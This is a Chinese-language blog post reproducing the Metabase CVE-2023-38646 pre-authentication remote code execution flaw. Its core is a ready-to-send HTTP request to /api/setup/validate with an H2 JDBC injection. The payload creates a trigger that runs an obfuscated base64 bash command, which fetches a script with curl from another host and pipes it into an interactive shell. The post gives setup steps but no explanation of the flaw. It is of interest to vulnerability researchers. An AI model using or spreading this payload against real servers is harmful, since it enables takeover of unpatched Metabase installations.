Metabase CVE-2023-38646 复现

作者: print("") 分类: 信息安全 发布时间: 2023-08-01 09:32

1. 环境安装: 

docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.46.6

访问:

http://192.168.1.72:3000/api/session/properties

需要先获取到setup-token

POC 

POST /api/setup/validate HTTP/1.1
Host: 192.168.1.72:3000
Content-Type: application/json
Content-Length: 800

{
    "token": "3831ff45-3258-40cc-9ac6-939c87da847c",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,Y3VybCAxOTIuMTY4LjEuNzI6ODY0LzEudHh0}|{base64,-d}|{bash,-i}')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}

具体漏洞原理。后续写上。

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

您的电子邮箱地址不会被公开。

更多阅读
标签云
Apache2.4.50 Apache ShenYu APISIX APISIX Dashboard cc5 CNVD-2021-49104 CNVD-2022-60632 CobaltStrike CobaltStrike xss CommonsCollections5 Confluence CVE-2021-26084 CVE-2017-18349 CVE-2021-4034 CVE-2021-37580 CVE-2021-41277 CVE-2021-41773 cve-2021-42013 CVE-2021-43798 CVE-2021-44228 CVE-2021-45232 CVE-2021-45232 RCE CVE-2022-22954 CVE-2022-22965 CVE-2022-39197 CVE-2023-28432 Django E-Office grafana keytool store log4j2 MetaBase ONE Access python python爬虫 socks5 socks5搜索 store 证书转换成nginx VMware Workspace ONE Access ysoserial 代理池工具 宝塔面板 泛微 畅捷通 畅捷通漏洞 通达OA